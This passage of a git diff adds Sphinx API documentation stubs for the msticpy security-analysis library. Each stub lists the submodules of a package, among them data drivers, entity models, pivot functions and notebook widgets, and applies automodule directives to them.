+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.analysis.anomalous_sequence.utils.rst b/docs/source/api/msticpy.analysis.anomalous_sequence.utils.rst
new file mode 100644
index 000000000..c0ff6b230
--- /dev/null
+++ b/docs/source/api/msticpy.analysis.anomalous_sequence.utils.rst
@@ -0,0 +1,61 @@
+msticpy.analysis.anomalous\_sequence.utils package
+==================================================
+
+Submodules
+----------
+
+msticpy.analysis.anomalous\_sequence.utils.cmds\_only module
+------------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils.cmds_only
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.utils.cmds\_params\_only module
+--------------------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils.cmds_params_only
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.utils.cmds\_params\_values module
+----------------------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils.cmds_params_values
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.utils.data\_structures module
+------------------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils.data_structures
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.utils.laplace\_smooth module
+-----------------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils.laplace_smooth
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.anomalous\_sequence.utils.probabilities module
+---------------------------------------------------------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils.probabilities
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.analysis.anomalous_sequence.utils
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.analysis.rst b/docs/source/api/msticpy.analysis.rst
new file mode 100644
index 000000000..9a584c7b7
--- /dev/null
+++ b/docs/source/api/msticpy.analysis.rst
@@ -0,0 +1,53 @@
+msticpy.analysis package
+========================
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.analysis.anomalous_sequence
+
+Submodules
+----------
+
+msticpy.analysis.cluster\_auditd module
+---------------------------------------
+
+.. automodule:: msticpy.analysis.cluster_auditd
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.eventcluster module
+------------------------------------
+
+.. automodule:: msticpy.analysis.eventcluster
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.outliers module
+--------------------------------
+
+.. automodule:: msticpy.analysis.outliers
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.analysis.timeseries module
+----------------------------------
+
+.. automodule:: msticpy.analysis.timeseries
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.analysis
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.common.rst b/docs/source/api/msticpy.common.rst
new file mode 100644
index 000000000..4c690fd3c
--- /dev/null
+++ b/docs/source/api/msticpy.common.rst
@@ -0,0 +1,125 @@
+msticpy.common package
+======================
+
+Submodules
+----------
+
+msticpy.common.azure\_auth module
+---------------------------------
+
+.. automodule:: msticpy.common.azure_auth
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.azure\_auth\_core module
+---------------------------------------
+
+.. automodule:: msticpy.common.azure_auth_core
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.check\_version module
+------------------------------------
+
+.. automodule:: msticpy.common.check_version
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.cloud\_mappings module
+-------------------------------------
+
+.. automodule:: msticpy.common.cloud_mappings
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.cred\_wrapper module
+-----------------------------------
+
+.. automodule:: msticpy.common.cred_wrapper
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.exceptions module
+--------------------------------
+
+.. automodule:: msticpy.common.exceptions
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.keyvault\_client module
+--------------------------------------
+
+.. automodule:: msticpy.common.keyvault_client
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.keyvault\_settings module
+----------------------------------------
+
+.. automodule:: msticpy.common.keyvault_settings
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.pkg\_config module
+---------------------------------
+
+.. automodule:: msticpy.common.pkg_config
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.provider\_settings module
+----------------------------------------
+
+.. automodule:: msticpy.common.provider_settings
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.secret\_settings module
+--------------------------------------
+
+.. automodule:: msticpy.common.secret_settings
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.timespan module
+------------------------------
+
+.. automodule:: msticpy.common.timespan
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.utility module
+-----------------------------
+
+.. automodule:: msticpy.common.utility
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.common.wsconfig module
+------------------------------
+
+.. automodule:: msticpy.common.wsconfig
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.common
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.config.rst b/docs/source/api/msticpy.config.rst
new file mode 100644
index 000000000..723bfa34e
--- /dev/null
+++ b/docs/source/api/msticpy.config.rst
@@ -0,0 +1,141 @@
+msticpy.config package
+======================
+
+Submodules
+----------
+
+msticpy.config.ce\_azure module
+-------------------------------
+
+.. automodule:: msticpy.config.ce_azure
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_azure\_sentinel module
+-----------------------------------------
+
+.. automodule:: msticpy.config.ce_azure_sentinel
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_common module
+--------------------------------
+
+.. automodule:: msticpy.config.ce_common
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_data\_providers module
+-----------------------------------------
+
+.. automodule:: msticpy.config.ce_data_providers
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_keyvault module
+----------------------------------
+
+.. automodule:: msticpy.config.ce_keyvault
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_other\_providers module
+------------------------------------------
+
+.. automodule:: msticpy.config.ce_other_providers
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_provider\_base module
+----------------------------------------
+
+.. automodule:: msticpy.config.ce_provider_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_simple\_settings module
+------------------------------------------
+
+.. automodule:: msticpy.config.ce_simple_settings
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_ti\_providers module
+---------------------------------------
+
+.. automodule:: msticpy.config.ce_ti_providers
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.ce\_user\_defaults module
+----------------------------------------
+
+.. automodule:: msticpy.config.ce_user_defaults
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.comp\_edit module
+--------------------------------
+
+.. automodule:: msticpy.config.comp_edit
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.compound\_ctrls module
+-------------------------------------
+
+.. automodule:: msticpy.config.compound_ctrls
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.file\_browser module
+-----------------------------------
+
+.. automodule:: msticpy.config.file_browser
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.mp\_config\_control module
+-----------------------------------------
+
+.. automodule:: msticpy.config.mp_config_control
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.mp\_config\_edit module
+--------------------------------------
+
+.. automodule:: msticpy.config.mp_config_edit
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.config.mp\_config\_file module
+--------------------------------------
+
+.. automodule:: msticpy.config.mp_config_file
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.config
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.data.azure.rst b/docs/source/api/msticpy.data.azure.rst
new file mode 100644
index 000000000..9c8329471
--- /dev/null
+++ b/docs/source/api/msticpy.data.azure.rst
@@ -0,0 +1,77 @@
+msticpy.data.azure package
+==========================
+
+Submodules
+----------
+
+msticpy.data.azure.azure\_blob\_storage module
+----------------------------------------------
+
+.. automodule:: msticpy.data.azure.azure_blob_storage
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.azure\_data module
+-------------------------------------
+
+.. automodule:: msticpy.data.azure.azure_data
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.sentinel\_analytics module
+---------------------------------------------
+
+.. automodule:: msticpy.data.azure.sentinel_analytics
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.sentinel\_bookmarks module
+---------------------------------------------
+
+.. automodule:: msticpy.data.azure.sentinel_bookmarks
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.sentinel\_core module
+----------------------------------------
+
+.. automodule:: msticpy.data.azure.sentinel_core
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.sentinel\_incidents module
+---------------------------------------------
+
+.. automodule:: msticpy.data.azure.sentinel_incidents
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.sentinel\_utils module
+-----------------------------------------
+
+.. automodule:: msticpy.data.azure.sentinel_utils
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure.sentinel\_watchlists module
+----------------------------------------------
+
+.. automodule:: msticpy.data.azure.sentinel_watchlists
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.data.azure
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.data.browsers.rst b/docs/source/api/msticpy.data.browsers.rst
new file mode 100644
index 000000000..f2266d2e2
--- /dev/null
+++ b/docs/source/api/msticpy.data.browsers.rst
@@ -0,0 +1,29 @@
+msticpy.data.browsers package
+=============================
+
+Submodules
+----------
+
+msticpy.data.browsers.mordor\_browser module
+--------------------------------------------
+
+.. automodule:: msticpy.data.browsers.mordor_browser
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.browsers.query\_browser module
+-------------------------------------------
+
+.. automodule:: msticpy.data.browsers.query_browser
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.data.browsers
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.data.drivers.rst b/docs/source/api/msticpy.data.drivers.rst
new file mode 100644
index 000000000..68fc17d8d
--- /dev/null
+++ b/docs/source/api/msticpy.data.drivers.rst
@@ -0,0 +1,101 @@
+msticpy.data.drivers package
+============================
+
+Submodules
+----------
+
+msticpy.data.drivers.driver\_base module
+----------------------------------------
+
+.. automodule:: msticpy.data.drivers.driver_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.kql\_driver module
+---------------------------------------
+
+.. automodule:: msticpy.data.drivers.kql_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.kusto\_driver module
+-----------------------------------------
+
+.. automodule:: msticpy.data.drivers.kusto_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.local\_data\_driver module
+-----------------------------------------------
+
+.. automodule:: msticpy.data.drivers.local_data_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.mdatp\_driver module
+-----------------------------------------
+
+.. automodule:: msticpy.data.drivers.mdatp_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.mordor\_driver module
+------------------------------------------
+
+.. automodule:: msticpy.data.drivers.mordor_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.odata\_driver module
+-----------------------------------------
+
+.. automodule:: msticpy.data.drivers.odata_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.resource\_graph\_driver module
+---------------------------------------------------
+
+.. automodule:: msticpy.data.drivers.resource_graph_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.security\_graph\_driver module
+---------------------------------------------------
+
+.. automodule:: msticpy.data.drivers.security_graph_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.splunk\_driver module
+------------------------------------------
+
+.. automodule:: msticpy.data.drivers.splunk_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.drivers.sumologic\_driver module
+---------------------------------------------
+
+.. automodule:: msticpy.data.drivers.sumologic_driver
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.data.drivers
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.data.rst b/docs/source/api/msticpy.data.rst
new file mode 100644
index 000000000..6c87b388f
--- /dev/null
+++ b/docs/source/api/msticpy.data.rst
@@ -0,0 +1,120 @@
+msticpy.data package
+====================
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.data.azure
+   msticpy.data.browsers
+   msticpy.data.drivers
+   msticpy.data.uploaders
+
+Submodules
+----------
+
+msticpy.data.azure\_blob\_storage module
+----------------------------------------
+
+.. automodule:: msticpy.data.azure_blob_storage
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure\_data module
+-------------------------------
+
+.. automodule:: msticpy.data.azure_data
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.azure\_sentinel module
+-----------------------------------
+
+.. automodule:: msticpy.data.azure_sentinel
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.data\_obfus module
+-------------------------------
+
+.. automodule:: msticpy.data.data_obfus
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.data\_providers module
+-----------------------------------
+
+.. automodule:: msticpy.data.data_providers
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.data\_query\_reader module
+---------------------------------------
+
+.. automodule:: msticpy.data.data_query_reader
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.param\_extractor module
+------------------------------------
+
+.. automodule:: msticpy.data.param_extractor
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.query\_container module
+------------------------------------
+
+.. automodule:: msticpy.data.query_container
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.query\_defns module
+--------------------------------
+
+.. automodule:: msticpy.data.query_defns
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.query\_source module
+---------------------------------
+
+.. automodule:: msticpy.data.query_source
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.query\_store module
+--------------------------------
+
+.. automodule:: msticpy.data.query_store
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.sql\_to\_kql module
+--------------------------------
+
+.. automodule:: msticpy.data.sql_to_kql
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.data
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.data.uploaders.rst b/docs/source/api/msticpy.data.uploaders.rst
new file mode 100644
index 000000000..33ceec136
--- /dev/null
+++ b/docs/source/api/msticpy.data.uploaders.rst
@@ -0,0 +1,37 @@
+msticpy.data.uploaders package
+==============================
+
+Submodules
+----------
+
+msticpy.data.uploaders.loganalytics\_uploader module
+----------------------------------------------------
+
+.. automodule:: msticpy.data.uploaders.loganalytics_uploader
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.uploaders.splunk\_uploader module
+----------------------------------------------
+
+.. automodule:: msticpy.data.uploaders.splunk_uploader
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.data.uploaders.uploader\_base module
+--------------------------------------------
+
+.. automodule:: msticpy.data.uploaders.uploader_base
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.data.uploaders
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.datamodel.entities.rst b/docs/source/api/msticpy.datamodel.entities.rst
new file mode 100644
index 000000000..73ef8f1aa
--- /dev/null
+++ b/docs/source/api/msticpy.datamodel.entities.rst
@@ -0,0 +1,253 @@
+msticpy.datamodel.entities package
+==================================
+
+Submodules
+----------
+
+msticpy.datamodel.entities.account module
+-----------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.account
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.alert module
+---------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.alert
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.azure\_resource module
+-------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.azure_resource
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.cloud\_application module
+----------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.cloud_application
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.cloud\_logon\_session module
+-------------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.cloud_logon_session
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.dns module
+-------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.dns
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.entity module
+----------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.entity
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.entity\_enums module
+-----------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.entity_enums
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.entity\_graph module
+-----------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.entity_graph
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.file module
+--------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.file
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.file\_hash module
+--------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.file_hash
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.geo\_location module
+-----------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.geo_location
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.graph\_property module
+-------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.graph_property
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.host module
+--------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.host
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.host\_logon\_session module
+------------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.host_logon_session
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.iot\_device module
+---------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.iot_device
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.ip\_address module
+---------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.ip_address
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.mail\_cluster module
+-----------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.mail_cluster
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.mail\_message module
+-----------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.mail_message
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.mailbox module
+-----------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.mailbox
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.malware module
+-----------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.malware
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.network\_connection module
+-----------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.network_connection
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.process module
+-----------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.process
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.registry\_key module
+-----------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.registry_key
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.registry\_value module
+-------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.registry_value
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.security\_group module
+-------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.security_group
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.submission\_mail module
+--------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.submission_mail
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.threat\_intelligence module
+------------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.threat_intelligence
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.unknown\_entity module
+-------------------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.unknown_entity
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.entities.url module
+-------------------------------------
+
+.. automodule:: msticpy.datamodel.entities.url
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.datamodel.entities
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.datamodel.rst b/docs/source/api/msticpy.datamodel.rst
new file mode 100644
index 000000000..59ddc4f79
--- /dev/null
+++ b/docs/source/api/msticpy.datamodel.rst
@@ -0,0 +1,102 @@
+msticpy.datamodel package
+=========================
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.datamodel.entities
+   msticpy.datamodel.soc
+
+Submodules
+----------
+
+msticpy.datamodel.pivot module
+------------------------------
+
+.. automodule:: msticpy.datamodel.pivot
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_browser module
+---------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_browser
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_data\_queries module
+---------------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_data_queries
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_magic\_core module
+-------------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_magic_core
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_pd\_accessor module
+--------------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_pd_accessor
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_pipeline module
+----------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_pipeline
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_register module
+----------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_register
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_register\_reader module
+------------------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_register_reader
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.pivot\_ti\_provider module
+--------------------------------------------
+
+.. automodule:: msticpy.datamodel.pivot_ti_provider
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.datamodel.txt\_df\_magic module
+---------------------------------------
+
+.. automodule:: msticpy.datamodel.txt_df_magic
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.datamodel
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.datamodel.soc.rst b/docs/source/api/msticpy.datamodel.soc.rst
new file mode 100644
index 000000000..6e3f4dc92
--- /dev/null
+++ b/docs/source/api/msticpy.datamodel.soc.rst
@@ -0,0 +1,21 @@
+msticpy.datamodel.soc package
+=============================
+
+Submodules
+----------
+
+msticpy.datamodel.soc.incident module
+-------------------------------------
+
+.. automodule:: msticpy.datamodel.soc.incident
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.datamodel.soc
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.nbtools.nbwidgets.rst b/docs/source/api/msticpy.nbtools.nbwidgets.rst
new file mode 100644
index 000000000..b0106c8eb
--- /dev/null
+++ b/docs/source/api/msticpy.nbtools.nbwidgets.rst
@@ -0,0 +1,93 @@
+msticpy.nbtools.nbwidgets package
+=================================
+
+Submodules
+----------
+
+msticpy.nbtools.nbwidgets.core module
+-------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.core
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.get\_environment\_key module
+------------------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.get_environment_key
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.get\_text module
+------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.get_text
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.lookback module
+-----------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.lookback
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.option\_buttons module
+------------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.option_buttons
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.progress module
+-----------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.progress
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.query\_time module
+--------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.query_time
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.select\_alert module
+----------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.select_alert
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.select\_item module
+---------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.select_item
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbwidgets.select\_subset module
+-----------------------------------------------
+
+.. automodule:: msticpy.nbtools.nbwidgets.select_subset
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+Module contents
+---------------
+
+.. automodule:: msticpy.nbtools.nbwidgets
+   :members:
+   :undoc-members:
+   :show-inheritance:
diff --git a/docs/source/api/msticpy.nbtools.rst b/docs/source/api/msticpy.nbtools.rst
new file mode 100644
index 000000000..fe930450a
--- /dev/null
+++ b/docs/source/api/msticpy.nbtools.rst
@@ -0,0 +1,189 @@
+msticpy.nbtools package
+=======================
+
+Subpackages
+-----------
+
+.. toctree::
+   :maxdepth: 4
+
+   msticpy.nbtools.nbwidgets
+
+Submodules
+----------
+
+msticpy.nbtools.azure\_ml\_tools module
+---------------------------------------
+
+.. automodule:: msticpy.nbtools.azure_ml_tools
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.data\_viewer module
+-----------------------------------
+
+.. automodule:: msticpy.nbtools.data_viewer
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.entityschema module
+-----------------------------------
+
+.. automodule:: msticpy.nbtools.entityschema
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.foliummap module
+--------------------------------
+
+.. automodule:: msticpy.nbtools.foliummap
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.morph\_charts module
+------------------------------------
+
+.. automodule:: msticpy.nbtools.morph_charts
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbdisplay module
+--------------------------------
+
+.. automodule:: msticpy.nbtools.nbdisplay
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.nbinit module
+-----------------------------
+
+.. automodule:: msticpy.nbtools.nbinit
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.observationlist module
+--------------------------------------
+
+.. automodule:: msticpy.nbtools.observationlist
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.process\_tree module
+------------------------------------
+
+.. automodule:: msticpy.nbtools.process_tree
+   :members:
+   :undoc-members:
+   :show-inheritance:
+
+msticpy.nbtools.security\_alert module
+--------------------------------------
+
